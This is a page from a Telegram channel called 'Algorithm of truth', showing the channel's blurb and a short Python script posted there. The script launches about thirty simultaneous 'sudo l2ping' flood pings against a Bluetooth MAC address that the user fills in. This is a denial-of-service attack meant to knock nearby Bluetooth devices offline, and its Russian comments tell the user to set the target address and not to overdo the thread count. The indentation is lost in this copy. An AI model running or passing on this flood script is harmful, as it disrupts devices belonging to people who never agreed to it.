Algorithm of truth
906 subscribers
2.59K photos
671 videos
464 files
6.08K links
SPEED UP THE EVOLUTION - justice is here - 010110110110011101011101100011110 - ONLY VERIFIED INFORMATIONS! NO FAKE. https://t.me/Algorithm_of_truth_GROUP https://t.me/algorithm_of_truth_index
https://t.me/algorithmoftruthindex2024
Download Telegram
#!/usr/bin/env python
import subprocess
from time import sleep

try:
# 30 - количество потоков. Не переусерствуейте.
for i in range(1, 30):
#Заменить мак адрес на свой
xterm = "sudo l2ping -i hci0 -s 10 -f 00:00:00:00:00:00"
process = subprocess.Popen(xterm, stderr=subprocess.PIPE, shell=True)
#data = process.communicate()
print(i)
#print(data)
except(KeyboardInterrupt, OSError):
print("Exit.")